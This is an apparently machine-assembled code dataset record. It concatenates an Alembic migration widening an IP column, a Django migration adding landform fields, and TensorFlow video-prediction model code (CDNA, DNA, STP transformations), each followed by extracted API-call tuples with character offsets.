'os.path.basename', (['path.path'], {}), '(path.path)\n', (9946, 9957), False, 'import os\n'), ((10330, 10391), 'tensorflow.python.estimator.gc._get_paths', 'gc._get_paths', (['export_dir_base'], {'parser': '_export_version_parser'}), '(export_dir_base, parser=_export_version_parser)\n', (10343, 10391), False, 'from tensorflow.python.estimator import gc\n'), ((11051, 11076), 'os.path.join', 'os.path.join', (['event_files'], {}), '(event_files)\n', (11063, 11076), False, 'import os\n'), ((11104, 11149), 'tensorflow.python.summary.summary_iterator.summary_iterator', 'summary_iterator.summary_iterator', (['event_file'], {}), '(event_file)\n', (11137, 11149), False, 'from tensorflow.python.summary import summary_iterator\n'), ((8832, 8856), 'json.dump', 'json.dump', (['self._log', 'fp'], {}), '(self._log, fp)\n', (8841, 8856), False, 'import json\n'), ((9073, 9110), 'os.path.join', 'os.path.join', (['dest_path', '"""checkpoint"""'], {}), "(dest_path, 'checkpoint')\n", (9085, 9110), False, 'import os\n'), ((10465, 10496), 'tensorflow.python.platform.gfile.DeleteRecursively', 'gfile.DeleteRecursively', (['p.path'], {}), '(p.path)\n', (10488, 10496), False, 'from tensorflow.python.platform import gfile\n'), ((8763, 8802), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (8775, 8802), False, 'import os\n'), ((10564, 10627), 'tensorflow.python.platform.tf_logging.warn', 'tf_logging.warn', (['"""Can not delete %s recursively: %s"""', 'p.path', 'e'], {}), "('Can not delete %s recursively: %s', p.path, e)\n", (10579, 10627), False, 'from tensorflow.python.platform import tf_logging\n'), ((7790, 7829), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7802, 7829), False, 'import os\n')] |
"""extend_ip_field
Revision ID: 8da20383f6e1
Revises: <KEY>
Create Date: 2021-01-14 10:50:56.275257
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "8da20383f6e1"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()[f"upgrade_{engine_name}"]()
def downgrade(engine_name):
globals()[f"downgrade_{engine_name}"]()
def upgrade_registrar():
pass
def downgrade_registrar():
pass
def upgrade_cloud_verifier():
with op.batch_alter_table("verifiermain") as batch_op:
batch_op.alter_column(
"ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True
)
def downgrade_cloud_verifier():
pass
| [
"sqlalchemy.String",
"alembic.op.batch_alter_table"
] | [((543, 579), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""verifiermain"""'], {}), "('verifiermain')\n", (563, 579), False, 'from alembic import op\n'), ((656, 676), 'sqlalchemy.String', 'sa.String', ([], {'length': '(15)'}), '(length=15)\n', (665, 676), True, 'import sqlalchemy as sa\n'), ((684, 705), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (693, 705), True, 'import sqlalchemy as sa\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-07-10 20:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ucsrb', '0012_auto_20180710_1249'),
]
operations = [
migrations.AddField(
model_name='treatmentscenario',
name='landform_type',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes',
field=models.TextField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_east_west',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_floor',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_north',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_ridgetop',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_south',
field=models.BooleanField(default=True),
),
]
| [
"django.db.models.TextField",
"django.db.models.BooleanField"
] | [((415, 449), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (434, 449), False, 'from django.db import migrations, models\n'), ((598, 651), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (614, 651), False, 'from django.db import migrations, models\n'), ((818, 851), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (837, 851), False, 'from django.db import migrations, models\n'), ((1014, 1047), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1033, 1047), False, 'from django.db import migrations, models\n'), ((1210, 1243), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1229, 1243), False, 'from django.db import migrations, models\n'), ((1409, 1442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1428, 1442), False, 'from django.db import migrations, models\n'), ((1605, 1638), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1624, 1638), False, 'from django.db import migrations, models\n')] |
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
latent_loss: loss of the latent twoer
samples: random samples sampled from standard guassian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
cdna: True to use Convoluational Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
latent = samples[timestep]
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden lyaer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden lyaer to be used for computing DNA transformation.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
| [
"tensorflow.unstack",
"tensorflow.pad",
"tensorflow.transpose",
"tensorflow.contrib.slim.arg_scope",
"spatial_transformer.transformer",
"tensorflow.reduce_sum",
"tensorflow.split",
"numpy.array",
"tensorflow.control_dependencies",
"tensorflow.contrib.slim.layers.conv2d",
"tensorflow.reduce_mean",
"tensorflow.slice",
"tensorflow.nn.depthwise_conv2d",
"tensorflow.random_normal",
"tensorflow.dynamic_stitch",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"tensorflow.square",
"tensorflow.range",
"tensorflow.gather",
"tensorflow.reshape",
"tensorflow.contrib.slim.layers.conv2d_transpose",
"tensorflow.contrib.slim.layers.fully_connected",
"tensorflow.nn.relu",
"tensorflow.to_float",
"tensorflow.exp",
"tensorflow.identity",
"tensorflow.contrib.layers.python.layers.layer_norm",
"tensorflow.contrib.slim.conv2d"
] | [((14752, 14879), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['cdna_input', '(DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks)'], {'scope': '"""cdna_params"""', 'activation_fn': 'None'}), "(cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE *\n num_masks, scope='cdna_params', activation_fn=None)\n", (14779, 14879), True, 'import tensorflow.contrib.slim as slim\n'), ((14944, 15029), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]'], {}), '(cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]\n )\n', (14954, 15029), True, 'import tensorflow as tf\n'), ((15112, 15164), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['cdna_kerns', '[1, 2, 3]'], {'keep_dims': '(True)'}), '(cdna_kerns, [1, 2, 3], keep_dims=True)\n', (15125, 15164), True, 'import tensorflow as tf\n'), ((15475, 15516), 'tensorflow.transpose', 'tf.transpose', (['cdna_kerns', '[1, 2, 0, 4, 3]'], {}), '(cdna_kerns, [1, 2, 0, 4, 3])\n', (15487, 15516), True, 'import tensorflow as tf\n'), ((15532, 15609), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]'], {}), '(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])\n', (15542, 15609), True, 'import tensorflow as tf\n'), ((15668, 15706), 'tensorflow.transpose', 'tf.transpose', (['prev_image', '[3, 1, 2, 0]'], {}), '(prev_image, [3, 1, 2, 0])\n', (15680, 15706), True, 'import tensorflow as tf\n'), ((15745, 15813), 'tensorflow.nn.depthwise_conv2d', 'tf.nn.depthwise_conv2d', (['prev_image', 'cdna_kerns', '[1, 1, 1, 1]', '"""SAME"""'], {}), "(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')\n", (15767, 15813), True, 'import tensorflow as tf\n'), ((15882, 15961), 'tensorflow.reshape', 'tf.reshape', (['transformed', '[color_channels, height, width, batch_size, num_masks]'], {}), '(transformed, [color_channels, height, width, batch_size, num_masks])\n', (15892, 15961), True, 'import tensorflow as tf\n'), ((15978, 16020), 'tensorflow.transpose', 'tf.transpose', (['transformed', '[3, 1, 2, 0, 4]'], {}), '(transformed, [3, 1, 2, 0, 4])\n', (15990, 16020), True, 'import tensorflow as tf\n'), ((16037, 16069), 'tensorflow.unstack', 'tf.unstack', (['transformed'], {'axis': '(-1)'}), '(transformed, axis=-1)\n', (16047, 16069), True, 'import tensorflow as tf\n'), ((16458, 16510), 'tensorflow.pad', 'tf.pad', (['prev_image', '[[0, 0], [2, 2], [2, 2], [0, 0]]'], {}), '(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])\n', (16464, 16510), True, 'import tensorflow as tf\n'), ((16883, 16915), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'inputs'}), '(axis=3, values=inputs)\n', (16892, 16915), True, 'import tensorflow as tf\n'), ((17116, 17168), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['(kernel * inputs)', '[3]'], {'keep_dims': '(False)'}), '(kernel * inputs, [3], keep_dims=False)\n', (17129, 17168), True, 'import tensorflow as tf\n'), ((17885, 17928), 'tensorflow.gather', 'tf.gather', (['ground_truth_x', 'ground_truth_idx'], {}), '(ground_truth_x, ground_truth_idx)\n', (17894, 17928), True, 'import tensorflow as tf\n'), ((17950, 17987), 'tensorflow.gather', 'tf.gather', (['generated_x', 'generated_idx'], {}), '(generated_x, generated_idx)\n', (17959, 17987), True, 'import tensorflow as tf\n'), ((17997, 18094), 'tensorflow.dynamic_stitch', 'tf.dynamic_stitch', (['[ground_truth_idx, generated_idx]', '[ground_truth_examps, generated_examps]'], {}), '([ground_truth_idx, generated_idx], [ground_truth_examps,\n generated_examps])\n', (18014, 18094), True, 'import tensorflow as tf\n'), ((2297, 2339), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'reuse': '(False)'}), '([slim.conv2d], reuse=False)\n', (2311, 2339), True, 'import tensorflow.contrib.slim as slim\n'), ((2362, 2382), 'tensorflow.concat', 'tf.concat', (['images', '(3)'], {}), '(images, 3)\n', (2371, 2382), True, 'import tensorflow as tf\n'), ((2402, 2562), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['stacked_images', '(32)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm1'}"}), "(stacked_images, 32, [3, 3], stride=2, scope='latent_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm1'})\n", (2413, 2562), True, 'import tensorflow.contrib.slim as slim\n'), ((2623, 2780), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc1', '(64)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv2"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm2'}"}), "(latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm2'})\n", (2634, 2780), True, 'import tensorflow.contrib.slim as slim\n'), ((2841, 2998), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc2', '(64)', '[3, 3]'], {'stride': '(1)', 'scope': '"""latent_conv3"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm3'}"}), "(latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm3'})\n", (2852, 2998), True, 'import tensorflow.contrib.slim as slim\n'), ((3059, 3259), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'activation_fn': 'None', 'scope': '"""latent_mean"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm_mean'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2,\n activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.\n layer_norm, normalizer_params={'scope': 'latent_norm_mean'})\n", (3070, 3259), True, 'import tensorflow.contrib.slim as slim\n'), ((3326, 3505), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_std"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_std_norm'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope=\n 'latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={\n 'scope': 'latent_std_norm'})\n", (3337, 3505), True, 'import tensorflow.contrib.slim as slim\n'), ((3660, 3686), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['divergence'], {}), '(divergence)\n', (3674, 3686), True, 'import tensorflow as tf\n'), ((3769, 3862), 'tensorflow.random_normal', 'tf.random_normal', (['([FLAGS.sequence_length - 1] + latent_mean.shape)', '(0)', '(1)'], {'dtype': 'tf.float32'}), '([FLAGS.sequence_length - 1] + latent_mean.shape, 0, 1,\n dtype=tf.float32)\n', (3785, 3862), True, 'import tensorflow as tf\n'), ((3927, 3986), 'tensorflow.random_normal', 'tf.random_normal', (['latent_mean.shape', '(0)', '(1)'], {'dtype': 'tf.float32'}), '(latent_mean.shape, 0, 1, dtype=tf.float32)\n', (3943, 3986), True, 'import tensorflow as tf\n'), ((5811, 5829), 'tensorflow.identity', 'tf.identity', (['image'], {}), '(image)\n', (5822, 5829), True, 'import tensorflow as tf\n'), ((6488, 6527), 'numpy.array', 'np.array', (['[32, 32, 64, 64, 128, 64, 32]'], {}), '([32, 32, 64, 64, 128, 64, 32])\n', (6496, 6527), True, 'import numpy as np\n'), ((13722, 13774), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0, 0.0, 1.0, 0.0]', 'np.float32'], {}), '([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)\n', (13730, 13774), True, 'import numpy as np\n'), ((15047, 15082), 'tensorflow.nn.relu', 'tf.nn.relu', (['(cdna_kerns - RELU_SHIFT)'], {}), '(cdna_kerns - RELU_SHIFT)\n', (15057, 15082), True, 'import tensorflow as tf\n'), ((16957, 16991), 'tensorflow.nn.relu', 'tf.nn.relu', (['(dna_input - RELU_SHIFT)'], {}), '(dna_input - RELU_SHIFT)\n', (16967, 16991), True, 'import tensorflow as tf\n'), ((17754, 17780), 'tensorflow.range', 'tf.range', (['num_ground_truth'], {}), '(num_ground_truth)\n', (17762, 17780), True, 'import tensorflow as tf\n'), ((7085, 7230), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.\n layer_norm, slim.layers.conv2d_transpose]'], {'reuse': 'reuse'}), '([lstm_func, slim.layers.conv2d, slim.layers.fully_connected,\n tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse)\n', (7099, 7230), True, 'import tensorflow.contrib.slim as slim\n'), ((7696, 7745), 